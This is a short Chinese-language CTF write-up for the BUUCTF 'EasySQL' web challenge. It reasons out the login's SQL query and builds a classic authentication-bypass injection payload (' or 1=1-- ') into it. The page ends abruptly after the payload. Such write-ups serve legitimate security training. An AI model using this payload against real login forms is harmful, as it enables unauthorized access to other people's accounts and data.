> For the complete documentation index, see [llms.txt](https://functfan.gitbook.io/gewuzz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://functfan.gitbook.io/gewuzz/ctf-bi-sai/buuctf-lian-xi-chang-web.md).

# BUUCTF-练习场web

题目1：\[极客大挑战 2019]EasySQL

![](https://1702163534-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M7oudw7uWMhEPV8wJgq%2F-MdyYT5mKUCyizEKpCfY%2F-MdyYxWPxUiwjlN7-x5B%2Fimage.png?alt=media\&token=b92d0682-a3d8-47d8-9d9d-d20b625ef348)

解答过程：

要求输入用户名与密码，输入错误提示wrong username and password，输入admin'后

![](https://1702163534-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M7oudw7uWMhEPV8wJgq%2F-Mdy_VQwKVGcalilFCHL%2F-MdyhLC77nedOpjj7cnC%2Fimage.png?alt=media\&token=36f9e972-301b-409f-96a6-0ff4f4acc554)

因此，猜测字段名为username和password，并猜想其sql语句为

select \* from table where username='admin' and password='admin'

当用户名为admin'时，语句变为：

select \* from table where username='admin'  'and password='admin'

因此可以构造：username=

select \* from table where username='admin' and password=' ' or 1=1-- '
